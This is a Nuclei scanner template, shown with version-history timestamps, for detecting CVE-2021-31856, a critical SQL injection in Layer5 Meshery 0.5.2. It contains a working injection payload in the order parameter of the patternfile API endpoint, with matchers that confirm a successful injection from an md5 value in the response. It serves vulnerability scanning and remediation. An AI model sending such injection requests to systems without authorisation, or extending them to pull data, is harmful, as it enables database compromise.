nuclei-templates/http/cves/2021/CVE-2021-31856.yaml

46 lines
1.4 KiB
YAML
Raw Normal View History

2021-09-01 12:15:54 +00:00
id: CVE-2021-31856
info:
name: Layer5 Meshery 0.5.2 - SQL Injection
2021-09-01 12:15:54 +00:00
author: princechaddha
severity: critical
description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856).
2021-09-01 12:15:54 +00:00
reference:
- https://github.com/ssst0n3/CVE-2021-31856
- https://nvd.nist.gov/vuln/detail/CVE-2021-31856
- https://meshery.io
- https://github.com/layer5io/meshery/pull/2745
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-31856
cwe-id: CWE-89
2023-07-11 19:49:27 +00:00
epss-score: 0.05376
2023-08-31 11:46:18 +00:00
epss-percentile: 0.92134
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: layer5
product: meshery
tags: sqli,cve,cve2021
2022-06-30 03:34:25 +00:00
variables:
num: "999999999"
http:
2021-09-01 12:15:54 +00:00
- method: GET
path:
2022-06-30 03:34:25 +00:00
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"
2021-09-01 12:15:54 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-09-01 12:15:54 +00:00
words:
2022-06-30 03:34:25 +00:00
- '{{md5({{num}})}}'
2021-09-01 12:15:54 +00:00
- type: status
status:
- 200